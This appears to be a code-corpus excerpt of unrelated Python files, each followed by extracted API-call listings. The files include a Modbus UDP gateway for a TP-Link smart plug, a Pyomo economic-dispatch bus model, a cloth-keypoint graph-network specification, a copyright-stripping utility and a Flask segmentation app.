'from airflow.contrib.operators.aws_athena_operator import AWSAthenaOperator\n'), ((976, 1018), 'jinja2.PackageLoader', 'PackageLoader', (['"""kite_airflow"""', '"""templates"""'], {}), "('kite_airflow', 'templates')\n", (989, 1018), False, 'from jinja2 import PackageLoader\n'), ((1544, 1570), 'datetime.timedelta', 'datetime.timedelta', ([], {'days': '(1)'}), '(days=1)\n', (1562, 1570), False, 'import datetime\n'), ((3824, 3960), 'airflow.operators.python_operator.PythonOperator', 'PythonOperator', ([], {'python_callable': 'copy_profile_deltas', 'task_id': 'copy_profile_deltas.__name__', 'dag': 'dag', 'retries': '(2)', 'provide_context': '(True)'}), '(python_callable=copy_profile_deltas, task_id=\n copy_profile_deltas.__name__, dag=dag, retries=2, provide_context=True)\n', (3838, 3960), False, 'from airflow.operators.python_operator import PythonOperator\n'), ((3982, 4251), 'airflow.contrib.operators.aws_athena_operator.AWSAthenaOperator', 'AWSAthenaOperator', ([], {'aws_conn_id': '"""aws_us_east_1"""', 'task_id': '"""rollup_people"""', 'query': '"""athena/queries/mixpanel_people_rollup.tmpl.sql"""', 'output_location': '"""s3://kite-metrics-test/athena-results/ddl"""', 'database': '"""kite_metrics"""', 'dag': 'dag', 'params': "{'schema': people_schema}"}), "(aws_conn_id='aws_us_east_1', task_id='rollup_people',\n query='athena/queries/mixpanel_people_rollup.tmpl.sql', output_location\n ='s3://kite-metrics-test/athena-results/ddl', database='kite_metrics',\n dag=dag, params={'schema': people_schema})\n", (3999, 4251), False, 'from airflow.contrib.operators.aws_athena_operator import AWSAthenaOperator\n'), ((1755, 1782), 'datetime.timedelta', 'datetime.timedelta', ([], {'hours': '(4)'}), '(hours=4)\n', (1773, 1782), False, 'import datetime\n'), ((2437, 2496), 'airflow.models.Variable.get', 'Variable.get', (['"""mixpanel_credentials"""'], {'deserialize_json': '(True)'}), "('mixpanel_credentials', deserialize_json=True)\n", (2449, 2496), False, 'from airflow.models import Variable\n'), ((3309, 3363), 'datetime.datetime.fromtimestamp', 'datetime.datetime.fromtimestamp', (['(line[ts_field] / 1000)'], {}), '(line[ts_field] / 1000)\n', (3340, 3363), False, 'import datetime\n'), ((3512, 3528), 'json.dumps', 'json.dumps', (['line'], {}), '(line)\n', (3522, 3528), False, 'import json\n')]
|
#! /usr/bin/python3
#
# @(!--#) @(#) modbusgwudp.py, version 003, 02-july-2018
#
# modbus gateway over UDP for a TP-Link HS100/HS110 Smart WiFi Plug
#
# Links
#
# https://www.softscheck.com/en/reverse-engineering-tp-link-hs110/
# https://github.com/softScheck/tplink-smartplug
# https://github.com/softScheck/tplink-smartplug/blob/master/tplink-smartplug.py
# https://unserver.xyz/modbus-guide/
#
#
# imports
#
import sys
import os
import argparse
import socket
########################################################################
DEFAULT_MODBUS_PORT = "8502"
MAX_PACKET_LENGTH = 1024
GETSYSINFO = '{"system":{"get_sysinfo":{}}}'
SETRELAYON = '{"system":{"set_relay_state":{"state":1}}}'
SETRELAYOFF = '{"system":{"set_relay_state":{"state":0}}}'
########################################################################
def showpacket(bytes):
bpr = 16 # bpr is Bytes Per Row
numbytes = len(bytes)
if numbytes == 0:
print("<empty frame>")
else:
i = 0
while i < numbytes:
if (i % bpr) == 0:
print("{:04d} :".format(i), sep='', end='')
print(" {:02X}".format(bytes[i]), sep='', end='')
if ((i + 1) % bpr) == 0:
print()
i = i + 1
if (numbytes % bpr) != 0:
print()
return
########################################################################
def encrypt(barray):
key = 171
result = bytearray(len(barray) + 4)
i = 4
for b in barray:
a = key ^ b
key = a
result[i] = a
i += 1
return result
########################################################################
def decrypt(barray):
key = 171
result = bytearray(len(barray))
i = 0
for b in barray:
a = key ^ b
key = b
result[i] = a
i += 1
return result
########################################################################
def runplugcommand(ipaddr, command):
tcp = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
tcp.connect((ipaddr, 9999))
tcp.send(encrypt(bytearray(command, 'utf-8')))
plugdata = tcp.recv(MAX_PACKET_LENGTH)
tcp.close()
return(decrypt(plugdata[4:]))
########################################################################
def getrelaystatus(ipaddr):
sysinfo = runplugcommand(ipaddr, '{"system":{"get_sysinfo":{}}}')
if bytearray('","relay_state":0,', 'utf-8') in sysinfo:
return 0
elif bytearray('","relay_state":1,', 'utf-8') in sysinfo:
return 1
else:
return None
########################################################################
def setrelaystatus(ipaddr, status):
if status == 0:
cmd = SETRELAYOFF
else:
cmd = SETRELAYON
errcode = runplugcommand(ipaddr, cmd)
########################################################################
#
# Main
#
progname = os.path.basename(sys.argv[0])
parser = argparse.ArgumentParser()
parser.add_argument("--ipaddr", help="IP address of the HS100/HS110 plug")
parser.add_argument("--port", help="port number to listen on", default=DEFAULT_MODBUS_PORT)
args = parser.parse_args()
ipaddr = args.ipaddr
port = int(args.port)
print("====== {} === HS100/110 IP address: {} === Modbus Port: {} ======".format(progname, ipaddr, port))
udp = socket.socket(family=socket.AF_INET, type=socket.SOCK_DGRAM)
udp.bind(('', port))
while True:
print("Waiting to receive incoming Modbus packet over UDP")
try:
databytes, clientaddress = udp.recvfrom(MAX_PACKET_LENGTH)
except ConnectionResetError:
print("{}: got a ConnectionResetError - ignoring".format(progname), file=sys.stderr)
continue
if len(databytes) < 6:
print("{}: runt Modbus UDP packet received - ignoring".format(progname), file=sys.stderr)
showpacket(databytes)
continue
packetlength = (databytes[4] * 256) + databytes[5]
if (packetlength < 2):
print("{}: Modbus UDP packet length too short to have any useful data in it - ignoring".format(progname), file=sys.stderr)
showpacket(databytes)
continue
if (packetlength + 6) != len(databytes):
print("{}: Modbus UDP packet has incorrect length - ignoring".format(progname), file=sys.stderr)
showpacket(databytes)
continue
unitid = databytes[6]
if unitid != 1:
print("{}: this gateway only serves Modbus UDP packets with Unit ID of 1 - ignoring".format(progname), file=sys.stderr)
showpacket(databytes)
continue
functioncode = databytes[7]
if functioncode == 1:
# read coil
print("Function code 0x01 - read single coil")
showpacket(databytes)
if packetlength != 6:
print("{}: incorrect packet length for function code 0x01 - ignoring".format(progname), file=sys.stderr)
continue
addr = (databytes[8] * 256) + databytes[9]
if (addr != 0):
print("{}: this gateway only serves Modbus UDP packets with address of 0 - ignoring".format(progname), file=sys.stderr)
continue
numr = (databytes[10] * 256) + databytes[11]
if (numr != 1):
print("{}: this gateway only serves Modbus UDP packets with register count of 1 - ignoring".format(progname), file=sys.stderr)
continue
relay = getrelaystatus(ipaddr)
response = bytearray(6 + 4)
response[0:3] = databytes[0:3]
response[4] = 0
response[5] = 4
response[6] = 1
response[7] = 1
response[8] = 1
response[9] = relay
print("Sending response:")
showpacket(response)
udp.sendto(response, clientaddress)
continue
if functioncode == 5:
# write coil
print("Function code 0x05 - write single coil")
showpacket(databytes)
if packetlength != 6:
print("{}: incorrect packet length for function code 0x06 - ignoring".format(progname), file=sys.stderr)
showpacket(databytes)
continue
addr = (databytes[8] * 256) + databytes[9]
if (addr != 0):
print("{}: this gateway only serves Modbus UDP packets with address of 0 - ignoring".format(progname), file=sys.stderr)
continue
stat = (databytes[10] * 256) + databytes[11]
if ((stat != 0) and (stat != 0xFF00)):
print("{}: this gateway only serves Modbus UDP packets with register count of 1 - ignoring".format(progname), file=sys.stderr)
continue
setrelaystatus(ipaddr, stat)
response = bytearray(len(databytes))
response[0:12] = databytes[0:12]
print("Sending response:")
showpacket(response)
udp.sendto(response, clientaddress)
continue
print("{}: unrecognised or unsupported packet".format(progname), file=sys.stderr)
showpacket(databytes)
########################################################################
# end of file
|
[
"socket.socket",
"argparse.ArgumentParser",
"os.path.basename"
] |
[((2945, 2974), 'os.path.basename', 'os.path.basename', (['sys.argv[0]'], {}), '(sys.argv[0])\n', (2961, 2974), False, 'import os\n'), ((2985, 3010), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {}), '()\n', (3008, 3010), False, 'import argparse\n'), ((3363, 3423), 'socket.socket', 'socket.socket', ([], {'family': 'socket.AF_INET', 'type': 'socket.SOCK_DGRAM'}), '(family=socket.AF_INET, type=socket.SOCK_DGRAM)\n', (3376, 3423), False, 'import socket\n'), ((2021, 2070), 'socket.socket', 'socket.socket', (['socket.AF_INET', 'socket.SOCK_STREAM'], {}), '(socket.AF_INET, socket.SOCK_STREAM)\n', (2034, 2070), False, 'import socket\n')]
|
#!/usr/bin/env python3
# SPDX-License-Identifier: MIT
# Copyright (c) 2016-2020 <NAME>, <NAME>, <NAME>, <NAME>
import sys
import os
import json
class Config:
fnp = os.path.join(os.path.dirname(os.path.realpath(__file__)), "../config.json")
if not os.path.exists(fnp):
print("ERROR: file not found:", fnp)
print("\tfile should be symlink'd to a desired config.<blah>.json file")
sys.exit(1)
with open(fnp) as f:
c = json.load(f)
re = c["RE"]
partial_assemblies = re["partial_assemblies"] if "partial_assemblies" in re else []
version = re["version"]
db_host = re["db_host"]
db_usr = re["db_usr"]
db_port = re["db_port"]
db = re["db"]
assemblies = re["assemblies"]
minipeaks_ver = re["minipeaks_ver"]
minipeaks_nbins = re["minipeaks_nbins"]
ribbon = re["ribbon"]
GoogleAnalytics = re["googleAnalytics"]
memcache = re["memcache"]
cassandra = re["cassandra"]
redisHost = re["redisHost"]
bedupload = c["bedupload"]
downloadDir = re["downloadDir"]
rnaSeqIsNorm = re["rnaSeqIsNorm"]
#peakIntersectionRunDate = re["peakIntersectionRunDate"]
#cistromePeakIntersectionRunDate = re["cistromePeakIntersectionRunDate"]
|
[
"os.path.realpath",
"json.load",
"os.path.exists",
"sys.exit"
] |
[((261, 280), 'os.path.exists', 'os.path.exists', (['fnp'], {}), '(fnp)\n', (275, 280), False, 'import os\n'), ((416, 427), 'sys.exit', 'sys.exit', (['(1)'], {}), '(1)\n', (424, 427), False, 'import sys\n'), ((466, 478), 'json.load', 'json.load', (['f'], {}), '(f)\n', (475, 478), False, 'import json\n'), ((203, 229), 'os.path.realpath', 'os.path.realpath', (['__file__'], {}), '(__file__)\n', (219, 229), False, 'import os\n')]
|
# coding=utf-8
# Copyright 2021 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Gaussian noise policy."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from caql import policy
class GaussianNoisePolicy(policy.BasePolicy):
"""Implementation for gaussian noise policy."""
def __init__(self, greedy_policy, sigma, sigma_decay, sigma_min):
"""Creates an epsilon greedy policy.
Args:
greedy_policy: policy.BasePolicy. The policy that is used to compute a
greedy action.
sigma: float. Standard deviation for a gaussian distribution.
sigma_decay: float. Decay rate for the sigma.
sigma_min: float. The minimum value of the sigma.
"""
if not 0 <= sigma <= 1.0:
raise ValueError('sigma should be in [0.0, 1.0]')
self._greedy_policy = greedy_policy
self._sigma = sigma
self._sigma_decay = sigma_decay
self._sigma_min = sigma_min
@property
def sigma(self):
return self._sigma
def _action(self, state, use_action_function, batch_mode=False):
mean_action = self._greedy_policy.action(state, use_action_function,
batch_mode)
if mean_action is None:
return None
batch_action_dim = np.shape(mean_action)
# Match the scale of noise value to action value.
noise_exploration = (
self._sigma * self._greedy_policy.action_spec.maximum *
np.random.randn(*batch_action_dim))
return mean_action + noise_exploration
def _update_params(self):
self._sigma = max(self._sigma * self._sigma_decay, self._sigma_min)
def _params_debug_str(self):
return 'sigma: %.3f' % self._sigma
|
[
"numpy.shape",
"numpy.random.randn"
] |
[((1836, 1857), 'numpy.shape', 'np.shape', (['mean_action'], {}), '(mean_action)\n', (1844, 1857), True, 'import numpy as np\n'), ((2010, 2044), 'numpy.random.randn', 'np.random.randn', (['*batch_action_dim'], {}), '(*batch_action_dim)\n', (2025, 2044), True, 'import numpy as np\n')]
|
from ModelSpecification import NodeFormat, EdgeFormat, GlobalFormat, PositionFrame, \
GraphAttributeFormat, GraphNetStructure, ModelSpecification, ClothKeypoints, TrainingParams, LossFunction
# Define a model specification which can be instantiated
def specify_input_graph_format() -> GraphAttributeFormat:
return GraphAttributeFormat(
node_format=NodeFormat.XYZR_FixedFlag,
edge_format=EdgeFormat.DiffXYZ_ConnectionFlag,
global_format=GlobalFormat.NextEndEffectorXYZR,
)
def specify_position_output_graph_format() -> GraphAttributeFormat:
return GraphAttributeFormat(
node_format=NodeFormat.XYZ,
edge_format=EdgeFormat.DiffXYZ,
global_format=GlobalFormat.Dummy
)
def specify_has_moved_output_graph_format() -> GraphAttributeFormat:
return GraphAttributeFormat(
node_format=NodeFormat.HasMovedClasses,
edge_format=EdgeFormat.Dummy,
global_format=GlobalFormat.Dummy
)
def specify_cloth_keypoints_for_bag() -> ClothKeypoints:
return ClothKeypoints(
keypoint_indices=[
# Front
4, 127, 351, 380, 395, 557, 535, 550, 756, 783, 818, 1258,
# Back
150, 67, 420, 436, 920, 952, 1069, 1147, 1125, 1099, 929, 464,
# Left
142, 851, 1178,
# Right
49, 509, 1000,
# Bottom
641
],
keypoint_edges=[
# Front edges
(4, 351), (4, 1258),
(351, 380), (351, 818),
(380, 395), (380, 783),
(395, 756),
(127, 557), (127, 1258),
(557, 818), (557, 535),
(535, 783), (535, 550),
(550, 756),
(783, 818),
(818, 1258),
# Back edges
(436, 1069), (436, 420),
(1069, 952),
(952, 920),
(420, 1099), (420, 464),
(1099, 920), (1099, 1125),
(920, 929),
(464, 1125), (464, 67),
(1125, 929), (1125, 1147),
(67, 1147),
(150, 1147), (150, 929),
# Left edges
(920, 1178),
(1178, 535), (1178, 851),
(150, 142),
(851, 557), (851, 142), (851, 929),
(142, 127),
# Right edges
(509, 380), (509, 420), (509, 1000),
(1000, 351), (1000, 464), (1000, 49),
(49, 4), (49, 67),
# Bottom edges
(641, 127), (641, 4),
(641, 67), (641, 150),
],
fixed_keypoint_indices=[395, 550, 756, 436, 952, 1069]
)
def specify_graph_net_structure() -> GraphNetStructure:
return GraphNetStructure(
encoder_node_layers=[64, 64],
encoder_edge_layers=[64, 64],
encoder_global_layers=[128],
core_node_layers=[128, 64],
core_edge_layers=[128, 64],
core_global_layers=[128],
num_processing_steps=5,
)
def specify_training_params() -> TrainingParams:
return TrainingParams(
frame_step=1,
movement_threshold=0.001,
batch_size=32,
)
def specify_motion_model(name: str) -> ModelSpecification:
return ModelSpecification(
name=name,
input_graph_format=specify_input_graph_format(),
output_graph_format=specify_position_output_graph_format(),
position_frame=PositionFrame.LocalToEndEffector,
graph_net_structure=specify_graph_net_structure(),
loss_function=LossFunction.MeanSquaredError_Position_NodesOnly,
cloth_keypoints=specify_cloth_keypoints_for_bag(),
training_params=specify_training_params(),
)
def specify_has_moved_model(name: str) -> ModelSpecification:
return ModelSpecification(
name=name,
input_graph_format=specify_input_graph_format(),
output_graph_format=specify_has_moved_output_graph_format(),
position_frame=PositionFrame.LocalToEndEffector,
graph_net_structure=specify_graph_net_structure(),
loss_function=LossFunction.CrossEntropy,
cloth_keypoints=specify_cloth_keypoints_for_bag(),
training_params=specify_training_params(),
)
|
[
"ModelSpecification.TrainingParams",
"ModelSpecification.ClothKeypoints",
"ModelSpecification.GraphAttributeFormat",
"ModelSpecification.GraphNetStructure"
] |
[((325, 489), 'ModelSpecification.GraphAttributeFormat', 'GraphAttributeFormat', ([], {'node_format': 'NodeFormat.XYZR_FixedFlag', 'edge_format': 'EdgeFormat.DiffXYZ_ConnectionFlag', 'global_format': 'GlobalFormat.NextEndEffectorXYZR'}), '(node_format=NodeFormat.XYZR_FixedFlag, edge_format=\n EdgeFormat.DiffXYZ_ConnectionFlag, global_format=GlobalFormat.\n NextEndEffectorXYZR)\n', (345, 489), False, 'from ModelSpecification import NodeFormat, EdgeFormat, GlobalFormat, PositionFrame, GraphAttributeFormat, GraphNetStructure, ModelSpecification, ClothKeypoints, TrainingParams, LossFunction\n'), ((592, 711), 'ModelSpecification.GraphAttributeFormat', 'GraphAttributeFormat', ([], {'node_format': 'NodeFormat.XYZ', 'edge_format': 'EdgeFormat.DiffXYZ', 'global_format': 'GlobalFormat.Dummy'}), '(node_format=NodeFormat.XYZ, edge_format=EdgeFormat.\n DiffXYZ, global_format=GlobalFormat.Dummy)\n', (612, 711), False, 'from ModelSpecification import NodeFormat, EdgeFormat, GlobalFormat, PositionFrame, GraphAttributeFormat, GraphNetStructure, ModelSpecification, ClothKeypoints, TrainingParams, LossFunction\n'), ((819, 948), 'ModelSpecification.GraphAttributeFormat', 'GraphAttributeFormat', ([], {'node_format': 'NodeFormat.HasMovedClasses', 'edge_format': 'EdgeFormat.Dummy', 'global_format': 'GlobalFormat.Dummy'}), '(node_format=NodeFormat.HasMovedClasses, edge_format=\n EdgeFormat.Dummy, global_format=GlobalFormat.Dummy)\n', (839, 948), False, 'from ModelSpecification import NodeFormat, EdgeFormat, GlobalFormat, PositionFrame, GraphAttributeFormat, GraphNetStructure, ModelSpecification, ClothKeypoints, TrainingParams, LossFunction\n'), ((1044, 1992), 'ModelSpecification.ClothKeypoints', 'ClothKeypoints', ([], {'keypoint_indices': '[4, 127, 351, 380, 395, 557, 535, 550, 756, 783, 818, 1258, 150, 67, 420, \n 436, 920, 952, 1069, 1147, 1125, 1099, 929, 464, 142, 851, 1178, 49, \n 509, 1000, 641]', 'keypoint_edges': '[(4, 351), (4, 1258), (351, 380), (351, 818), (380, 395), (380, 783), (395,\n 756), (127, 557), (127, 1258), (557, 818), (557, 535), (535, 783), (535,\n 550), (550, 756), (783, 818), (818, 1258), (436, 1069), (436, 420), (\n 1069, 952), (952, 920), (420, 1099), (420, 464), (1099, 920), (1099, \n 1125), (920, 929), (464, 1125), (464, 67), (1125, 929), (1125, 1147), (\n 67, 1147), (150, 1147), (150, 929), (920, 1178), (1178, 535), (1178, \n 851), (150, 142), (851, 557), (851, 142), (851, 929), (142, 127), (509,\n 380), (509, 420), (509, 1000), (1000, 351), (1000, 464), (1000, 49), (\n 49, 4), (49, 67), (641, 127), (641, 4), (641, 67), (641, 150)]', 'fixed_keypoint_indices': '[395, 550, 756, 436, 952, 1069]'}), '(keypoint_indices=[4, 127, 351, 380, 395, 557, 535, 550, 756,\n 783, 818, 1258, 150, 67, 420, 436, 920, 952, 1069, 1147, 1125, 1099, \n 929, 464, 142, 851, 1178, 49, 509, 1000, 641], keypoint_edges=[(4, 351),\n (4, 1258), (351, 380), (351, 818), (380, 395), (380, 783), (395, 756),\n (127, 557), (127, 1258), (557, 818), (557, 535), (535, 783), (535, 550),\n (550, 756), (783, 818), (818, 1258), (436, 1069), (436, 420), (1069, \n 952), (952, 920), (420, 1099), (420, 464), (1099, 920), (1099, 1125), (\n 920, 929), (464, 1125), (464, 67), (1125, 929), (1125, 1147), (67, 1147\n ), (150, 1147), (150, 929), (920, 1178), (1178, 535), (1178, 851), (150,\n 142), (851, 557), (851, 142), (851, 929), (142, 127), (509, 380), (509,\n 420), (509, 1000), (1000, 351), (1000, 464), (1000, 49), (49, 4), (49, \n 67), (641, 127), (641, 4), (641, 67), (641, 150)],\n fixed_keypoint_indices=[395, 550, 756, 436, 952, 1069])\n', (1058, 1992), False, 'from ModelSpecification import NodeFormat, EdgeFormat, GlobalFormat, PositionFrame, GraphAttributeFormat, GraphNetStructure, ModelSpecification, ClothKeypoints, TrainingParams, LossFunction\n'), ((2708, 2933), 'ModelSpecification.GraphNetStructure', 'GraphNetStructure', ([], {'encoder_node_layers': '[64, 64]', 'encoder_edge_layers': '[64, 64]', 'encoder_global_layers': '[128]', 'core_node_layers': '[128, 64]', 'core_edge_layers': '[128, 64]', 'core_global_layers': '[128]', 'num_processing_steps': '(5)'}), '(encoder_node_layers=[64, 64], encoder_edge_layers=[64, 64\n ], encoder_global_layers=[128], core_node_layers=[128, 64],\n core_edge_layers=[128, 64], core_global_layers=[128],\n num_processing_steps=5)\n', (2725, 2933), False, 'from ModelSpecification import NodeFormat, EdgeFormat, GlobalFormat, PositionFrame, GraphAttributeFormat, GraphNetStructure, ModelSpecification, ClothKeypoints, TrainingParams, LossFunction\n'), ((3046, 3115), 'ModelSpecification.TrainingParams', 'TrainingParams', ([], {'frame_step': '(1)', 'movement_threshold': '(0.001)', 'batch_size': '(32)'}), '(frame_step=1, movement_threshold=0.001, batch_size=32)\n', (3060, 3115), False, 'from ModelSpecification import NodeFormat, EdgeFormat, GlobalFormat, PositionFrame, GraphAttributeFormat, GraphNetStructure, ModelSpecification, ClothKeypoints, TrainingParams, LossFunction\n')]
|
#####################################################################################
# MIT License #
# #
# Copyright (C) 2018 <NAME> #
# #
# This file is part of copyright-updater. #
# #
# Permission is hereby granted, free of charge, to any person obtaining a copy #
# of this software and associated documentation files (the "Software"), to deal #
# in the Software without restriction, including without limitation the rights #
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell #
# copies of the Software, and to permit persons to whom the Software is #
# furnished to do so, subject to the following conditions: #
# #
# The above copyright notice and this permission notice shall be included in all #
# copies or substantial portions of the Software. #
# #
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR #
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, #
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE #
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER #
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, #
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE #
# SOFTWARE. #
#####################################################################################
from .console_logger import ConsoleLogger
from .copyright import Copyright
from .comment_parameters import CommentParameters
from .comment import comment_copyright
from .find import find_copyright, is_copyright_exist
from shutil import copyfile
import os
def erase_copyright(target_file_name, with_backup):
with open(target_file_name, 'r') as f:
file_lines = f.readlines()
try:
copyright = find_copyright(file_lines)
except:
ConsoleLogger.status('No copyright detected in ' + target_file_name + ' - skipping.')
return True
with open(target_file_name, 'r') as target_file:
target_content = target_file.read()
if with_backup:
copyfile(target_file_name, target_file_name + '.backup')
os.remove(target_file_name)
with open(target_file_name, 'w') as new_file:
copyright_content = ''.join(copyright.lines)
new_content = target_content.replace(copyright_content + '\n' + '\n', '')
new_content = new_content.replace(copyright_content + '\n', '')
new_content = new_content.replace(copyright_content, '')
new_file.write(new_content)
ConsoleLogger.success('Copyright erased in ' + target_file_name)
return True
|
[
"shutil.copyfile",
"os.remove"
] |
[((2928, 2955), 'os.remove', 'os.remove', (['target_file_name'], {}), '(target_file_name)\n', (2937, 2955), False, 'import os\n'), ((2867, 2923), 'shutil.copyfile', 'copyfile', (['target_file_name', "(target_file_name + '.backup')"], {}), "(target_file_name, target_file_name + '.backup')\n", (2875, 2923), False, 'from shutil import copyfile\n')]
|
# -*- coding: utf-8 -*-
# Copyright 2021 Tampere University and VTT Technical Research Centre of Finland
# This software was developed as a part of the ProCemPlus project: https://www.senecc.fi/projects/procemplus
# This source code is licensed under the MIT license. See LICENSE in the repository root directory.
# Author(s): <NAME> <<EMAIL>>
# <NAME> <<EMAIL>>
"""
Contains class for Bus.
"""
import pyomo.environ as pyo
from economic_dispatch.model.units.base import _Unit
from economic_dispatch.model.factory import UnitFactory
def _get_index(name, from_list):
for index, u in enumerate(from_list):
if u.name == name:
return index
return None
class Bus:
"""
Bus containing all units related to this bus
...
Attributes
----------
name: str
name of the bus
units: dict
key: unit name, value: unit object
unit_names: list
list of unit names
Methods
-------
block_rule(block: pyo.Block)
Builds all the optimisation model components for this unit type
on top of the passed block.
topics(prefix: bool=True)
returns a list of network's units' problem instance parameter names,
if prefix=True '{unit.name}.' is added before attribute names.
add(unit: _Unit)
add unit to bus
remove(name: str)
remove unit from bus
"""
def __init__(self, name, units=None):
"""
Parameters
----------
name: str
name of the bus
units: List
list of all unit objects related to this bus
"""
if units is None:
units = []
self.name = name
self._units = units
def __repr__(self):
return self.__class__.__name__ + '(units=' + str(list(self.unit_names)) + ')'
def add(self, unit):
""" Adds unit to bus. """
if isinstance(unit, _Unit):
self._units.append(unit)
else:
raise ValueError("Input unit is not valid")
def remove(self, name):
""" Removes unit from bus. """
if name in self.unit_names:
self._units.pop(_get_index(name, self._units))
def topics(self, prefix=True):
""" Return a list of bus's units' problem instance parameter names.
If prefix=True '{unit.name}.' is added before attribute names.
"""
return [t for u in self._units for t in u.topics(prefix=prefix)]
@property
def units(self):
""" Dictionary with unit names as keys and unit objects as values. """
return {u.name: u for u in self._units}
@property
def unit_names(self):
""" List of unit names. """
return list(self.units.keys())
def clear(self):
""" Sets problem instance parameter values of units to None. """
for unit in self._units:
unit.clear()
def ready(self):
""" Returns True if all problem instance parameter values are ready for all units. """
return all(unit.ready() for unit in self._units)
def block_rule(self, block):
"""
Builds all the optimisation model components for this bus
on top of the passed block.
The underlying model should have its time index set at attr T
Parameters
----------
block: pyo.Block
bus level block of the model.
"""
model = block.model()
network = block.parent_block()
def U_init(b):
return self.unit_names
block.U = pyo.Set(initialize=U_init)
# Block rules to units
def unit_rule(b, i):
self.units[i].block_rule(b)
block.Units = pyo.Block(block.U, rule=unit_rule)
# Optimized units
def controllable_init(b):
return [u for u in b.U if hasattr(b.Units[u], 'dispatch')]
block.C = pyo.Set(initialize=controllable_init)
# Total real power injection to bus
def inj_rule(b, i):
return sum(network.icd_matrix[self.name, line] * network.Lines[line].power_flow[i]
for line in network.L)
block.net_injection = pyo.Expression(model.T, rule=inj_rule)
# Dispatches minus electrical loads
def rp_rule(b, i):
return sum(b.Units[u].real_power[i] for u in b.U)
block.real_power = pyo.Expression(model.T, rule=rp_rule)
# Power balance constraint
def demand_rule(b, i):
return b.real_power[i] == b.net_injection[i]
block.demand_balance = pyo.Constraint(model.T, rule=demand_rule)
# Cost
def op_cost_rule(b, i):
return sum(b.Units[u].operational_cost[i] for u in b.U)
block.operational_cost = pyo.Expression(model.T, rule=op_cost_rule)
# Cost
def cost_rule(b, i):
return sum(b.Units[u].cost[i] for u in b.U)
block.cost = pyo.Expression(model.T, rule=cost_rule)
@classmethod
def from_json(cls, json_bus):
""" Creates a Bus from dictionary and returns it. """
json_units = json_bus.get("units")
units = []
for json_unit in json_units:
unit = UnitFactory.make_component(**json_unit)
units.append(unit)
json_bus["units"] = units
bus = Bus(**json_bus)
return bus
|
[
"economic_dispatch.model.factory.UnitFactory.make_component",
"pyomo.environ.Expression",
"pyomo.environ.Constraint",
"pyomo.environ.Block",
"pyomo.environ.Set"
] |
[((3565, 3591), 'pyomo.environ.Set', 'pyo.Set', ([], {'initialize': 'U_init'}), '(initialize=U_init)\n', (3572, 3591), True, 'import pyomo.environ as pyo\n'), ((3716, 3750), 'pyomo.environ.Block', 'pyo.Block', (['block.U'], {'rule': 'unit_rule'}), '(block.U, rule=unit_rule)\n', (3725, 3750), True, 'import pyomo.environ as pyo\n'), ((3902, 3939), 'pyomo.environ.Set', 'pyo.Set', ([], {'initialize': 'controllable_init'}), '(initialize=controllable_init)\n', (3909, 3939), True, 'import pyomo.environ as pyo\n'), ((4185, 4223), 'pyomo.environ.Expression', 'pyo.Expression', (['model.T'], {'rule': 'inj_rule'}), '(model.T, rule=inj_rule)\n', (4199, 4223), True, 'import pyomo.environ as pyo\n'), ((4386, 4423), 'pyomo.environ.Expression', 'pyo.Expression', (['model.T'], {'rule': 'rp_rule'}), '(model.T, rule=rp_rule)\n', (4400, 4423), True, 'import pyomo.environ as pyo\n'), ((4580, 4621), 'pyomo.environ.Constraint', 'pyo.Constraint', (['model.T'], {'rule': 'demand_rule'}), '(model.T, rule=demand_rule)\n', (4594, 4621), True, 'import pyomo.environ as pyo\n'), ((4772, 4814), 'pyomo.environ.Expression', 'pyo.Expression', (['model.T'], {'rule': 'op_cost_rule'}), '(model.T, rule=op_cost_rule)\n', (4786, 4814), True, 'import pyomo.environ as pyo\n'), ((4938, 4977), 'pyomo.environ.Expression', 'pyo.Expression', (['model.T'], {'rule': 'cost_rule'}), '(model.T, rule=cost_rule)\n', (4952, 4977), True, 'import pyomo.environ as pyo\n'), ((5210, 5249), 'economic_dispatch.model.factory.UnitFactory.make_component', 'UnitFactory.make_component', ([], {}), '(**json_unit)\n', (5236, 5249), False, 'from economic_dispatch.model.factory import UnitFactory\n')]
|
from datetime import datetime
from flask import Flask, request, render_template
from inference import get_category,save_image
app = Flask(__name__)
@app.route('/', methods=['GET', 'POST'])
def fragment():
# Write the GET Method to get the index file
if request.method == 'GET':
return render_template('index.html')
# Write the POST Method to post the results file
if request.method == 'POST':
print(request.files)
if 'file' not in request.files:
print('File Not Uploaded')
return
# Read file from upload
file = request.files['file']
save_image(file,"input")
# Get category of prediction
model1 = 'modelDeepLabV3_Mila.tflite'
model2 = 'lite-model_deeplabv3-xception65_1_default_2.tflite'
model3 = 'lite-model_mobilenetv2-coco_dr_1.tflite'
get_category(img=file, model =model1 ) #saves output as image in static folder
get_category(img=file, model =model2 )
get_category(img=file, model =model3 )
#from flask import Response
return render_template('result.html', model1=model1, model2=model2, model3=model3)
#Response(category.getvalue(), mimetype='image/png')
if __name__ == '__main__':
# app.run(debug=True)
app.run(port=33507, debug=True) #set to port 33507 so it runs in heroku
|
[
"flask.Flask",
"inference.save_image",
"flask.render_template",
"inference.get_category"
] |
